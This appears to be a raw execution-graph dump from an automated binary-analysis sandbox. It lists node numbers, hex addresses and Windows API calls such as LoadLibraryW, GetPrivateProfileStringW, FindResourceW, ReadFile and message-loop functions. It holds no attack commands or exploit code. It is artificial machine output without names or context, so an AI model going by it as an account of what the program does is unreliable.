                                                                                                              execution_graph 37631 44dea5 37632 44deb5 FreeLibrary 37631->37632 37633 44dec3 37631->37633 37632->37633 39953 427533 39957 427548 39953->39957 39966 425711 39953->39966 39954 4259da 40010 416760 11 API calls 39954->40010 39956 4275cb 39990 425506 39956->39990 39957->39956 39964 429b7a 39957->39964 39958 4260dd 40011 424251 120 API calls 39958->40011 39959 4259c2 39986 425ad6 39959->39986 40004 415c56 11 API calls 39959->40004 40016 4446ce 11 API calls 39964->40016 39966->39954 39966->39959 39969 429a4d 39966->39969 39972 422aeb memset memcpy memcpy 39966->39972 39976 4260a1 39966->39976 39982 429ac1 39966->39982 39989 425a38 39966->39989 40000 4227f0 memset memcpy 39966->40000 40001 422b84 15 API calls 39966->40001 40002 422b5d memset memcpy memcpy 39966->40002 40003 422640 13 API calls 39966->40003 40005 4241fc 11 API calls 39966->40005 40006 42413a 90 API calls 39966->40006 39970 429a66 39969->39970 39971 429a9b 39969->39971 40012 415c56 11 API calls 39970->40012 39975 429a96 39971->39975 40014 416760 11 API calls 39971->40014 39972->39966 40015 424251 120 API calls 39975->40015 40009 415c56 11 API calls 39976->40009 39978 429a7a 40013 416760 11 API calls 39978->40013 39982->39954 39982->39986 40017 415c56 11 API calls 39982->40017 39989->39959 40007 422640 13 API calls 39989->40007 40008 4226e0 12 API calls 39989->40008 39991 42554d 39990->39991 39994 425554 39990->39994 40018 423b34 103 API calls 39991->40018 40019 422586 12 API calls 39994->40019 39995 425567 39996 4255ba 39995->39996 39997 42556c memset 39995->39997 39996->39966 39998 425596 39997->39998 39998->39996 39999 4255a4 memset 39998->39999 39999->39996 40000->39966 40001->39966 40002->39966 40003->39966 40004->39954 40005->39966 40006->39966 40007->39989 40008->39989 40009->39954 40010->39958 40011->39986 40012->39978 40013->39975 40014->39975 40015->39982 40016->39982 40017->39954 40018->39994 40019->39995 40020 4147f3 40023 414561 40020->40023 40022 414813 40024 41456d 40023->40024 40025 41457f GetPrivateProfileIntW 40023->40025 40028 4143f1 memset _itow WritePrivateProfileStringW 40024->40028 40025->40022 40027 41457a 40027->40022 40028->40027 37634 4287c1 37635 4287d2 37634->37635 37638 429ac1 37634->37638 37639 428818 37635->37639 37640 42881f 37635->37640 37650 425711 37635->37650 37636 4259da 37697 416760 11 API calls 37636->37697 37649 425ad6 37638->37649 37704 415c56 11 API calls 37638->37704 37671 42013a 37639->37671 37699 420244 97 API calls 37640->37699 37642 4260dd 37698 424251 120 API calls 37642->37698 37645 4259c2 37645->37649 37691 415c56 11 API calls 37645->37691 37650->37636 37650->37638 37650->37645 37653 429a4d 37650->37653 37656 422aeb memset memcpy memcpy 37650->37656 37660 4260a1 37650->37660 37668 425a38 37650->37668 37687 4227f0 memset memcpy 37650->37687 37688 422b84 15 API calls 37650->37688 37689 422b5d memset memcpy memcpy 37650->37689 37690 422640 13 API calls 37650->37690 37692 4241fc 11 API calls 37650->37692 37693 42413a 90 API calls 37650->37693 37654 429a66 37653->37654 37655 429a9b 37653->37655 37700 415c56 11 API calls 37654->37700 37659 429a96 37655->37659 37702 416760 11 API calls 37655->37702 37656->37650 37703 424251 120 API calls 37659->37703 37696 415c56 11 API calls 37660->37696 37662 429a7a 37701 416760 11 API calls 37662->37701 37668->37645 37694 422640 13 API calls 37668->37694 37695 4226e0 12 API calls 37668->37695 37672 42014c 37671->37672 37675 420151 37671->37675 37714 41e466 97 API calls 37672->37714 37674 420162 37674->37650 37675->37674 37676 4201b3 37675->37676 37677 420229 37675->37677 37678 4201b8 37676->37678 37679 4201dc 37676->37679 37677->37674 37680 41fd5e 86 API calls 37677->37680 37705 41fbdb 37678->37705 37679->37674 37683 4201ff 37679->37683 37711 41fc4c 37679->37711 37680->37674 37683->37674 37686 42013a 97 API calls 37683->37686 37686->37674 37687->37650 37688->37650 37689->37650 37690->37650 37691->37636 37692->37650 37693->37650 37694->37668 37695->37668 37696->37636 37697->37642 37698->37649 37699->37650 37700->37662 37701->37659 37702->37659 37703->37638 37704->37636 37706 41fbf1 37705->37706 37707 41fbf8 37705->37707 37710 41fc39 37706->37710 37729 4446ce 11 API calls 37706->37729 37719 41ee26 37707->37719 37710->37674 37715 41fd5e 37710->37715 37712 41ee6b 86 API calls 37711->37712 37713 41fc5d 37712->37713 37713->37679 37714->37675 37718 41fd65 37715->37718 37716 41fdab 37716->37674 37717 41fbdb 86 API calls 37717->37718 37718->37716 37718->37717 37720 41ee41 37719->37720 37721 41ee32 37719->37721 37730 41edad 37720->37730 37733 4446ce 11 API calls 37721->37733 37724 41ee3c 37724->37706 37727 41ee58 37727->37724 37735 41ee6b 37727->37735 37729->37710 37739 41be52 37730->37739 37733->37724 37734 41eb85 11 API calls 37734->37727 37736 41ee70 37735->37736 37737 41ee78 37735->37737 37792 41bf99 86 API calls 37736->37792 37737->37724 37740 41be6f 37739->37740 37741 41be5f 37739->37741 37746 41be8c 37740->37746 37771 418c63 memset memset 37740->37771 37770 4446ce 11 API calls 37741->37770 37743 41be69 37743->37724 37743->37734 37746->37743 37747 41bf3a 37746->37747 37749 41bed1 37746->37749 37751 41bee7 37746->37751 37774 4446ce 11 API calls 37747->37774 37750 41bef0 37749->37750 37753 41bee2 37749->37753 37750->37751 37752 41bf01 37750->37752 37751->37743 37775 41a453 86 API calls 37751->37775 37754 41bf24 memset 37752->37754 37756 41bf14 37752->37756 37772 418a6d memset memcpy memset 37752->37772 37760 41ac13 37753->37760 37754->37743 37773 41a223 memset memcpy memset 37756->37773 37759 41bf20 37759->37754 37761 41ac3f memset 37760->37761 37762 41ac52 37760->37762 37767 41acd9 37761->37767 37764 41ac6a 37762->37764 37776 41dc14 19 API calls 37762->37776 37765 41aca1 37764->37765 37777 41519d 37764->37777 37765->37767 37768 41acc0 memset 37765->37768 37769 41accd memcpy 37765->37769 37767->37751 37768->37767 37769->37767 37770->37743 37771->37746 37772->37756 37773->37759 37774->37751 37776->37764 37780 4175ed 37777->37780 37788 417570 SetFilePointer 37780->37788 37783 41760a ReadFile 37784 417637 37783->37784 37785 417627 GetLastError 37783->37785 37786 4151b3 37784->37786 37787 41763e memset 37784->37787 37785->37786 37786->37765 37787->37786 37789 4175b2 37788->37789 37790 41759c GetLastError 37788->37790 37789->37783 37789->37786 37790->37789 37791 4175a8 GetLastError 37790->37791 37791->37789 37792->37737 37793 417bc5 37794 417c61 37793->37794 37795 417bda 37793->37795 37795->37794 37796 417bf6 UnmapViewOfFile CloseHandle 37795->37796 37798 417c2c 37795->37798 37800 4175b7 37795->37800 37796->37795 37796->37796 37798->37795 37805 41851e 20 API calls 37798->37805 37801 4175d6 CloseHandle 37800->37801 37802 4175c8 37801->37802 37803 4175df 37801->37803 37802->37803 37804 4175ce Sleep 37802->37804 37803->37795 37804->37801 37805->37798 37806 4152c7 malloc 37807 4152ef 37806->37807 37809 4152e2 37806->37809 37810 416760 11 API calls 37807->37810 37810->37809 40029 4148b6 FindResourceW 40030 4148cf SizeofResource 40029->40030 40033 4148f9 40029->40033 40031 4148e0 LoadResource 40030->40031 40030->40033 40032 4148ee LockResource 40031->40032 40031->40033 40032->40033 37811 415308 free 40034 441b3f 40044 43a9f6 40034->40044 40036 441b61 40217 4386af memset 40036->40217 40038 44189a 40039 442bd4 40038->40039 40040 4418e2 40038->40040 40041 4418ea 40039->40041 40219 441409 memset 40039->40219 40040->40041 40218 4414a9 12 API calls 40040->40218 40045 43aa20 40044->40045 40046 43aadf 40044->40046 40045->40046 40047 43aa34 memset 40045->40047 40046->40036 40048 43aa56 40047->40048 40049 43aa4d 40047->40049 40220 43a6e7 40048->40220 40228 42c02e memset 40049->40228 40054 43aad3 40230 4169a7 11 API calls 40054->40230 40055 43aaae 40055->40046 40055->40054 40070 43aae5 40055->40070 40057 43ac18 40059 43ac47 40057->40059 40232 42bbd5 memcpy memcpy memcpy memset memcpy 40057->40232 40060 43aca8 40059->40060 40233 438eed 16 API calls 40059->40233 40064 43acd5 40060->40064 40235 4233ae 11 API calls 40060->40235 40063 43ac87 40234 4233c5 16 API calls 40063->40234 40236 423426 11 API calls 40064->40236 40068 43ace1 40237 439811 163 API calls 40068->40237 40069 43a9f6 161 API calls 40069->40070 40070->40046 40070->40057 40070->40069 40231 439bbb 22 API calls 40070->40231 40072 43acfd 40078 43ad2c 40072->40078 40238 438eed 16 API calls 40072->40238 40074 43ad19 40239 4233c5 16 API calls 40074->40239 40076 43ad58 40240 44081d 163 API calls 40076->40240 40078->40076 40080 43add9 40078->40080 40080->40080 40244 423426 11 API calls 40080->40244 40081 43ae3a memset 40082 43ae73 40081->40082 40245 42e1c0 147 API calls 40082->40245 40083 43adab 40242 438c4e 163 API calls 40083->40242 40085 43ad6c 40085->40046 40085->40083 40241 42370b memset memcpy memset 40085->40241 40087 43ae96 40246 42e1c0 147 API calls 40087->40246 40089 43adcc 40243 440f84 12 API calls 40089->40243 40092 43aea8 40093 43aec1 40092->40093 40247 42e199 147 API calls 40092->40247 40095 43af00 40093->40095 40248 42e1c0 147 API calls 40093->40248 40095->40046 40098 43af1a 40095->40098 40099 43b3d9 40095->40099 40249 438eed 16 API calls 40098->40249 40104 43b3f6 40099->40104 40111 43b4c8 40099->40111 40101 43b60f 40101->40046 40308 4393a5 17 API calls 40101->40308 40102 43af2f 40250 4233c5 16 API calls 40102->40250 40290 432878 12 API calls 40104->40290 40106 43af51 40251 423426 11 API calls 40106->40251 40109 43af7d 40252 423426 11 API calls 40109->40252 40110 43b4f2 40297 43a76c 21 API calls 40110->40297 40111->40110 40296 42bbd5 memcpy memcpy memcpy memset memcpy 40111->40296 40115 43b529 40298 44081d 163 API calls 40115->40298 40116 43b428 40144 43b462 40116->40144 40291 432b60 16 API calls 40116->40291 40117 43af94 40253 423330 11 API calls 40117->40253 40121 43b47e 40124 43b497 40121->40124 40293 42374a memcpy memset memcpy memcpy memcpy 40121->40293 40122 43b544 40132 43b55c 40122->40132 40299 42c02e memset 40122->40299 40123 43afca 40254 423330 11 API calls 40123->40254 40294 4233ae 11 API calls 40124->40294 40129 43afdb 40255 4233ae 11 API calls 40129->40255 40131 43b4b1 40295 423399 11 API calls 40131->40295 40300 43a87a 163 API calls 40132->40300 40134 43b56c 40137 43b58a 40134->40137 40301 423330 11 API calls 40134->40301 40136 43afee 40256 44081d 163 API calls 40136->40256 40302 440f84 12 API calls 40137->40302 40139 43b4c1 40304 42db80 163 API calls 40139->40304 40143 43b592 40303 43a82f 16 API calls 40143->40303 40292 423330 11 API calls 40144->40292 40147 43b5b4 40305 438c4e 163 API calls 40147->40305 40149 43b5cf 40306 42c02e memset 40149->40306 40151 43b005 40151->40046 40156 43b01f 40151->40156 40257 42d836 163 API calls 40151->40257 40152 43b1ef 40267 4233c5 16 API calls 40152->40267 40154 43b212 40268 423330 11 API calls 40154->40268 40156->40152 40265 423330 11 API calls 40156->40265 40266 42d71d 163 API calls 40156->40266 40158 43add4 40158->40101 40307 438f86 16 API calls 40158->40307 40161 43b087 40258 4233ae 11 API calls 40161->40258 40162 43b22a 40269 42ccb5 11 API calls 40162->40269 40165 43b10f 40261 423330 11 API calls 40165->40261 40166 43b23f 40270 4233ae 11 API calls 40166->40270 40168 43b257 40271 4233ae 11 API calls 40168->40271 40172 43b129 40262 4233ae 11 API calls 40172->40262 40173 43b26e 40272 4233ae 11 API calls 40173->40272 40175 43b09a 40175->40165 40259 42cc15 19 API calls 40175->40259 40260 4233ae 11 API calls 40175->40260 40177 43b282 40273 43a87a 163 API calls 40177->40273 40179 43b13c 40263 440f84 12 API calls 40179->40263 40181 43b29d 40274 423330 11 API calls 40181->40274 40184 43b15f 40264 4233ae 11 API calls 40184->40264 40185 43b2af 40187 43b2b8 40185->40187 40188 43b2ce 40185->40188 40275 4233ae 11 API calls 40187->40275 40276 440f84 12 API calls 40188->40276 40191 43b2c9 40278 4233ae 11 API calls 40191->40278 40192 43b2da 40277 42370b memset memcpy memset 40192->40277 40195 43b2f9 40279 423330 11 API calls 40195->40279 40197 43b30b 40280 423330 11 API calls 40197->40280 40199 43b325 40281 423399 11 API calls 40199->40281 40201 43b332 40282 4233ae 11 API calls 40201->40282 40203 43b354 40283 423399 11 API calls 40203->40283 40205 43b364 40284 43a82f 16 API calls 40205->40284 40207 43b370 40285 42db80 163 API calls 40207->40285 40209 43b380 40286 438c4e 163 API calls 40209->40286 40211 43b39e 40287 423399 11 API calls 40211->40287 40213 43b3ae 40288 43a76c 21 API calls 40213->40288 40215 43b3c3 40289 423399 11 API calls 40215->40289 40217->40038 40218->40041 40219->40039 40221 43a6f5 40220->40221 40227 43a765 40220->40227 40221->40227 40309 42a115 40221->40309 40225 43a73d 40226 42a115 147 API calls 40225->40226 40225->40227 40226->40227 40227->40046 40229 4397fd memset 40227->40229 40228->40048 40229->40055 40230->40046 40231->40070 40232->40059 40233->40063 40234->40060 40235->40064 40236->40068 40237->40072 40238->40074 40239->40078 40240->40085 40241->40083 40242->40089 40243->40158 40244->40081 40245->40087 40246->40092 40247->40093 40248->40093 40249->40102 40250->40106 40251->40109 40252->40117 40253->40123 40254->40129 40255->40136 40256->40151 40257->40161 40258->40175 40259->40175 40260->40175 40261->40172 40262->40179 40263->40184 40264->40156 40265->40156 40266->40156 40267->40154 40268->40162 40269->40166 40270->40168 40271->40173 40272->40177 40273->40181 40274->40185 40275->40191 40276->40192 40277->40191 40278->40195 40279->40197 40280->40199 40281->40201 40282->40203 40283->40205 40284->40207 40285->40209 40286->40211 40287->40213 40288->40215 40289->40158 40290->40116 40291->40144 40292->40121 40293->40124 40294->40131 40295->40139 40296->40110 40297->40115 40298->40122 40299->40132 40300->40134 40301->40137 40302->40143 40303->40139 40304->40147 40305->40149 40306->40158 40307->40101 40308->40046 40310 42a175 40309->40310 40312 42a122 40309->40312 40310->40227 40315 42b13b 147 API calls 40310->40315 40312->40310 40313 42a115 147 API calls 40312->40313 40316 43a174 40312->40316 40340 42a0a8 147 API calls 40312->40340 40313->40312 40315->40225 40330 43a196 40316->40330 40331 43a19e 40316->40331 40317 43a306 40317->40330 40356 4388c4 14 API calls 40317->40356 40320 42a115 147 API calls 40320->40331 40321 415a91 memset 40321->40331 40322 43a642 40322->40330 40360 4169a7 11 API calls 40322->40360 40326 43a635 40359 42c02e memset 40326->40359 40330->40312 40331->40317 40331->40320 40331->40321 40331->40330 40341 42ff8c 40331->40341 40349 4165ff 40331->40349 40352 439504 13 API calls 40331->40352 40353 4312d0 147 API calls 40331->40353 40354 42be4c memcpy memcpy memcpy memset memcpy 40331->40354 40355 43a121 11 API calls 40331->40355 40333 43a325 40333->40322 40333->40326 40333->40330 40334 4169a7 11 API calls 40333->40334 40335 42b5b5 memset memcpy 40333->40335 40336 42bf4c 14 API calls 40333->40336 40339 4165ff 11 API calls 40333->40339 40357 42b63e 14 API calls 40333->40357 40358 42bfcf memcpy 40333->40358 40334->40333 40335->40333 40336->40333 40339->40333 40340->40312 40361 43817e 40341->40361 40343 42ff99 40344 42ffe3 40343->40344 40345 42ffd0 40343->40345 40348 42ff9d 40343->40348 40366 4169a7 11 API calls 40344->40366 40365 4169a7 11 API calls 40345->40365 40348->40331 40350 4165a0 11 API calls 40349->40350 40351 41660d 40350->40351 40351->40331 40352->40331 40353->40331 40354->40331 40355->40331 40356->40333 40357->40333 40358->40333 40359->40322 40360->40330 40362 438187 40361->40362 40364 438192 40361->40364 40367 4380f6 40362->40367 40364->40343 40365->40348 40366->40348 40369 43811f 40367->40369 40368 438164 40368->40364 40369->40368 40371 4300e8 3 API calls 40369->40371 40372 437e5e 40369->40372 40371->40369 40395 437d3c 40372->40395 40374 437eb3 40374->40369 40375 437ea9 40375->40374 40381 437f22 40375->40381 40410 41f432 40375->40410 40378 437f06 40457 415c56 11 API calls 40378->40457 40380 437f95 40458 415c56 11 API calls 40380->40458 40382 437f7f 40381->40382 40383 432d4e 3 API calls 40381->40383 40382->40380 40385 43802b 40382->40385 40383->40382 40386 4165ff 11 API calls 40385->40386 40387 438054 40386->40387 40421 437371 40387->40421 40390 43806b 40391 438094 40390->40391 40459 42f50e 138 API calls 40390->40459 40393 437fa3 40391->40393 40394 4300e8 3 API calls 40391->40394 40393->40374 40460 41f638 104 API calls 40393->40460 40394->40393 40396 437d69 40395->40396 40399 437d80 40395->40399 40461 437ccb 11 API calls 40396->40461 40398 437d76 40398->40375 40399->40398 40400 437da3 40399->40400 40401 437d90 40399->40401 40403 438460 134 API calls 40400->40403 40401->40398 40465 437ccb 11 API calls 40401->40465 40406 437dcb 40403->40406 40405 437de8 40464 424f26 123 API calls 40405->40464 40406->40405 40462 444283 13 API calls 40406->40462 40408 437dfc 40463 437ccb 11 API calls 40408->40463 40411 41f54d 40410->40411 40417 41f44f 40410->40417 40412 41f466 40411->40412 40495 41c635 memset memset 40411->40495 40412->40378 40412->40381 40417->40412 40419 41f50b 40417->40419 40466 41f1a5 40417->40466 40491 41c06f memcmp 40417->40491 40492 41f3b1 90 API calls 40417->40492 40493 41f398 86 API calls 40417->40493 40419->40411 40419->40412 40494 41c295 86 API calls 40419->40494 40422 41703f 11 API calls 40421->40422 40423 437399 40422->40423 40424 43739d 40423->40424 40427 4373ac 40423->40427 40496 4446ea 11 API calls 40424->40496 40426 4373a7 40426->40390 40428 416935 16 API calls 40427->40428 40429 4373ca 40428->40429 40431 438460 134 API calls 40429->40431 40435 4251c4 137 API calls 40429->40435 40439 415a91 memset 40429->40439 40442 43758f 40429->40442 40454 437584 40429->40454 40456 437d3c 135 API calls 40429->40456 40497 425433 13 API calls 40429->40497 40498 425413 17 API calls 40429->40498 40499 42533e 16 API calls 40429->40499 40500 42538f 16 API calls 40429->40500 40501 42453e 123 API calls 40429->40501 40430 4375bc 40433 415c7d 16 API calls 40430->40433 40431->40429 40434 4375d2 40433->40434 40434->40426 40436 4442e6 11 API calls 40434->40436 40435->40429 40437 4375e2 40436->40437 40437->40426 40504 444283 13 API calls 40437->40504 40439->40429 40502 42453e 123 API calls 40442->40502 40443 4375f4 40448 437620 40443->40448 40449 43760b 40443->40449 40447 43759f 40450 416935 16 API calls 40447->40450 40452 416935 16 API calls 40448->40452 40505 444283 13 API calls 40449->40505 40450->40454 40452->40426 40454->40430 40503 42453e 123 API calls 40454->40503 40455 437612 memcpy 40455->40426 40456->40429 40457->40374 40458->40393 40459->40391 40460->40374 40461->40398 40462->40408 40463->40405 40464->40398 40465->40398 40467 41bc3b 101 API calls 40466->40467 40468 41f1b4 40467->40468 40469 41edad 86 API calls 40468->40469 40476 41f282 40468->40476 40470 41f1cb 40469->40470 40471 41f1f5 memcmp 40470->40471 40472 41f20e 40470->40472 40470->40476 40471->40472 40473 41f21b memcmp 40472->40473 40472->40476 40474 41f326 40473->40474 40477 41f23d 40473->40477 40475 41ee6b 86 API calls 40474->40475 40474->40476 40475->40476 40476->40417 40477->40474 40478 41f28e memcmp 40477->40478 40480 41c8df 56 API calls 40477->40480 40478->40474 40479 41f2a9 40478->40479 40479->40474 40482 41f308 40479->40482 40483 41f2d8 40479->40483 40481 41f269 40480->40481 40481->40474 40484 41f287 40481->40484 40485 41f27a 40481->40485 40482->40474 40489 4446ce 11 API calls 40482->40489 40486 41ee6b 86 API calls 40483->40486 40484->40478 40487 41ee6b 86 API calls 40485->40487 40488 41f2e0 40486->40488 40487->40476 40490 41b1ca memset 40488->40490 40489->40474 40490->40476 40491->40417 40492->40417 40493->40417 40494->40411 40495->40412 40496->40426 40497->40429 40498->40429 40499->40429 40500->40429 40501->40429 40502->40447 40503->40430 40504->40443 40505->40455 37812 41276d 37813 41277d 37812->37813 37855 4044a4 LoadLibraryW 37813->37855 37815 412785 37816 412789 37815->37816 37863 414b81 37815->37863 37819 4127c8 37869 412465 memset ??2@YAPAXI 37819->37869 37821 4127ea 37881 40ac21 37821->37881 37826 412813 37899 40dd07 memset 37826->37899 37827 412827 37904 40db69 memset 37827->37904 37830 412822 37925 4125b6 ??3@YAXPAX 37830->37925 37832 40ada2 _wcsicmp 37834 41283d 37832->37834 37834->37830 37837 412863 CoInitialize 37834->37837 37909 41268e 37834->37909 37929 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37837->37929 37840 41296f 37931 40b633 37840->37931 37842 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37847 412957 CoUninitialize 37842->37847 37852 4128ca 37842->37852 37847->37830 37848 4128d0 TranslateAcceleratorW 37849 412941 GetMessageW 37848->37849 37848->37852 37849->37847 37849->37848 37850 412909 IsDialogMessageW 37850->37849 37850->37852 37851 4128fd IsDialogMessageW 37851->37849 37851->37850 37852->37848 37852->37850 37852->37851 37853 41292b TranslateMessage DispatchMessageW 37852->37853 37854 41291f IsDialogMessageW 37852->37854 37853->37849 37854->37849 37854->37853 37856 4044f7 37855->37856 37857 4044cf GetProcAddress 37855->37857 37861 404507 MessageBoxW 37856->37861 37862 40451e 37856->37862 37858 4044e8 FreeLibrary 37857->37858 37859 4044df 37857->37859 37858->37856 37860 4044f3 37858->37860 37859->37858 37860->37856 37861->37815 37862->37815 37864 414b8a 37863->37864 37865 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37863->37865 37935 40a804 memset 37864->37935 37865->37819 37868 414b9e GetProcAddress 37868->37865 37870 4124e0 37869->37870 37871 412505 ??2@YAPAXI 37870->37871 37872 41251c 37871->37872 37877 412521 37871->37877 37957 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37872->37957 37946 444722 37877->37946 37880 41259b wcscpy 37880->37821 37962 40b1ab free free 37881->37962 37883 40ad76 37963 40aa04 37883->37963 37886 40a9ce malloc memcpy free free 37889 40ac5c 37886->37889 37887 40ad4b 37887->37883 37986 40a9ce 37887->37986 37889->37883 37889->37886 37889->37887 37890 40ace7 free 37889->37890 37966 40a8d0 37889->37966 37978 4099f4 37889->37978 37890->37889 37894 40a8d0 7 API calls 37894->37883 37895 40ada2 37896 40adc9 37895->37896 37897 40adaa 37895->37897 37896->37826 37896->37827 37897->37896 37898 40adb3 _wcsicmp 37897->37898 37898->37896 37898->37897 37991 40dce0 37899->37991 37901 40dd3a GetModuleHandleW 37996 40dba7 37901->37996 37905 40dce0 3 API calls 37904->37905 37906 40db99 37905->37906 38068 40dae1 37906->38068 38082 402f3a 37909->38082 37911 412766 37911->37830 37911->37837 37912 4126d3 _wcsicmp 37913 4126a8 37912->37913 37913->37911 37913->37912 37915 41270a 37913->37915 38117 4125f8 7 API calls 37913->38117 37915->37911 38085 411ac5 37915->38085 37926 4125da 37925->37926 37927 4125f0 37926->37927 37928 4125e6 DeleteObject 37926->37928 37930 40b1ab free free 37927->37930 37928->37927 37929->37842 37930->37840 37932 40b640 37931->37932 37933 40b639 free 37931->37933 37934 40b1ab free free 37932->37934 37933->37932 37934->37816 37936 40a83b GetSystemDirectoryW 37935->37936 37937 40a84c wcscpy 37935->37937 37936->37937 37942 409719 wcslen 37937->37942 37940 40a881 LoadLibraryW 37941 40a886 37940->37941 37941->37865 37941->37868 37943 409724 37942->37943 37944 409739 wcscat LoadLibraryW 37942->37944 37943->37944 37945 40972c wcscat 37943->37945 37944->37940 37944->37941 37945->37944 37947 444732 37946->37947 37948 444728 DeleteObject 37946->37948 37958 409cc3 37947->37958 37948->37947 37950 412551 37951 4010f9 37950->37951 37952 401130 37951->37952 37953 401134 GetModuleHandleW LoadIconW 37952->37953 37954 401107 wcsncat 37952->37954 37955 40a7be 37953->37955 37954->37952 37956 40a7d2 37955->37956 37956->37880 37956->37956 37957->37877 37961 409bfd memset wcscpy 37958->37961 37960 409cdb CreateFontIndirectW 37960->37950 37961->37960 37962->37889 37964 40aa14 37963->37964 37965 40aa0a free 37963->37965 37964->37895 37965->37964 37967 40a8eb 37966->37967 37968 40a8df wcslen 37966->37968 37969 40a906 free 37967->37969 37970 40a90f 37967->37970 37968->37967 37971 40a919 37969->37971 37972 4099f4 3 API calls 37970->37972 37973 40a932 37971->37973 37974 40a929 free 37971->37974 37972->37971 37976 4099f4 3 API calls 37973->37976 37975 40a93e memcpy 37974->37975 37975->37889 37977 40a93d 37976->37977 37977->37975 37979 409a41 37978->37979 37980 4099fb malloc 37978->37980 37979->37889 37982 409a37 37980->37982 37983 409a1c 37980->37983 37982->37889 37984 409a30 free 37983->37984 37985 409a20 memcpy 37983->37985 37984->37982 37985->37984 37987 40a9e7 37986->37987 37988 40a9dc free 37986->37988 37989 4099f4 3 API calls 37987->37989 37990 40a9f2 37988->37990 37989->37990 37990->37894 38015 409bca GetModuleFileNameW 37991->38015 37993 40dce6 wcsrchr 37994 40dcf5 37993->37994 37995 40dcf9 wcscat 37993->37995 37994->37995 37995->37901 38016 44db70 37996->38016 38000 40dbfd 38019 4447d9 38000->38019 38003 40dc34 wcscpy wcscpy 38045 40d6f5 38003->38045 38004 40dc1f wcscpy 38004->38003 38007 40d6f5 3 API calls 38008 40dc73 38007->38008 38009 40d6f5 3 API calls 38008->38009 38010 40dc89 38009->38010 38011 40d6f5 3 API calls 38010->38011 38012 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38011->38012 38051 40da80 38012->38051 38015->37993 38017 40dbb4 memset memset 38016->38017 38018 409bca GetModuleFileNameW 38017->38018 38018->38000 38020 4447f4 38019->38020 38021 40dc1b 38020->38021 38022 444807 ??2@YAPAXI 38020->38022 38021->38003 38021->38004 38023 44481f 38022->38023 38024 444873 _snwprintf 38023->38024 38025 4448ab wcscpy 38023->38025 38058 44474a 8 API calls 38024->38058 38027 4448bb 38025->38027 38059 44474a 8 API calls 38027->38059 38028 4448a7 38028->38025 38028->38027 38030 4448cd 38060 44474a 8 API calls 38030->38060 38032 4448e2 38061 44474a 8 API calls 38032->38061 38034 4448f7 38062 44474a 8 API calls 38034->38062 38036 44490c 38063 44474a 8 API calls 38036->38063 38038 444921 38064 44474a 8 API calls 38038->38064 38040 444936 38065 44474a 8 API calls 38040->38065 38042 44494b 38066 44474a 8 API calls 38042->38066 38044 444960 ??3@YAXPAX 38044->38021 38046 44db70 38045->38046 38047 40d702 memset GetPrivateProfileStringW 38046->38047 38048 40d752 38047->38048 38049 40d75c WritePrivateProfileStringW 38047->38049 38048->38049 38050 40d758 38048->38050 38049->38050 38050->38007 38052 44db70 38051->38052 38053 40da8d memset 38052->38053 38054 40daac LoadStringW 38053->38054 38057 40dac6 38054->38057 38056 40dade 38056->37830 38057->38054 38057->38056 38067 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38057->38067 38058->38028 38059->38030 38060->38032 38061->38034 38062->38036 38063->38038 38064->38040 38065->38042 38066->38044 38067->38057 38078 409b98 GetFileAttributesW 38068->38078 38070 40daea 38071 40daef wcscpy wcscpy GetPrivateProfileIntW 38070->38071 38077 40db63 38070->38077 38079 40d65d GetPrivateProfileStringW 38071->38079 38073 40db3e 38080 40d65d GetPrivateProfileStringW 38073->38080 38075 40db4f 38081 40d65d GetPrivateProfileStringW 38075->38081 38077->37832 38078->38070 38079->38073 38080->38075 38081->38077 38118 40eaff 38082->38118 38086 411ae2 memset 38085->38086 38087 411b8f 38085->38087 38158 409bca GetModuleFileNameW 38086->38158 38099 411a8b 38087->38099 38089 411b0a wcsrchr 38090 411b22 wcscat 38089->38090 38091 411b1f 38089->38091 38159 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38090->38159 38091->38090 38093 411b67 38160 402afb 38093->38160 38097 411b7f 38216 40ea13 SendMessageW memset SendMessageW 38097->38216 38100 402afb 27 API calls 38099->38100 38101 411ac0 38100->38101 38102 4110dc 38101->38102 38103 41113e 38102->38103 38108 4110f0 38102->38108 38241 40969c LoadCursorW SetCursor 38103->38241 38105 411143 38242 444a54 38105->38242 38245 4032b4 38105->38245 38263 40b1ab free free 38105->38263 38106 4110f7 _wcsicmp 38106->38108 38107 411157 38109 40ada2 _wcsicmp 38107->38109 38108->38103 38108->38106 38264 410c46 10 API calls 38108->38264 38112 411167 38109->38112 38110 4111af 38112->38110 38113 4111a6 qsort 38112->38113 38113->38110 38117->37913 38119 40eb10 38118->38119 38131 40e8e0 38119->38131 38122 40eb6c memcpy memcpy 38123 40ebb7 38122->38123 38123->38122 38124 40ebf2 ??2@YAPAXI ??2@YAPAXI 38123->38124 38126 40d134 16 API calls 38123->38126 38125 40ec65 38124->38125 38127 40ec2e ??2@YAPAXI 38124->38127 38141 40ea7f 38125->38141 38126->38123 38127->38125 38130 402f49 38130->37913 38132 40e8f2 38131->38132 38133 40e8eb ??3@YAXPAX 38131->38133 38134 40e900 38132->38134 38135 40e8f9 ??3@YAXPAX 38132->38135 38133->38132 38136 40e911 38134->38136 38137 40e90a ??3@YAXPAX 38134->38137 38135->38134 38138 40e931 ??2@YAPAXI ??2@YAPAXI 38136->38138 38139 40e921 ??3@YAXPAX 38136->38139 38140 40e92a ??3@YAXPAX 38136->38140 38137->38136 38138->38122 38139->38140 38140->38138 38142 40aa04 free 38141->38142 38143 40ea88 38142->38143 38144 40aa04 free 38143->38144 38145 40ea90 38144->38145 38146 40aa04 free 38145->38146 38147 40ea98 38146->38147 38148 40aa04 free 38147->38148 38149 40eaa0 38148->38149 38150 40a9ce 4 API calls 38149->38150 38151 40eab3 38150->38151 38152 40a9ce 4 API calls 38151->38152 38153 40eabd 38152->38153 38154 40a9ce 4 API calls 38153->38154 38155 40eac7 38154->38155 38156 40a9ce 4 API calls 38155->38156 38157 40ead1 38156->38157 38157->38130 38158->38089 38159->38093 38217 40b2cc 38160->38217 38162 402b0a 38163 40b2cc 27 API calls 38162->38163 38164 402b23 38163->38164 38165 40b2cc 27 API calls 38164->38165 38166 402b3a 38165->38166 38167 40b2cc 27 API calls 38166->38167 38168 402b54 38167->38168 38169 40b2cc 27 API calls 38168->38169 38170 402b6b 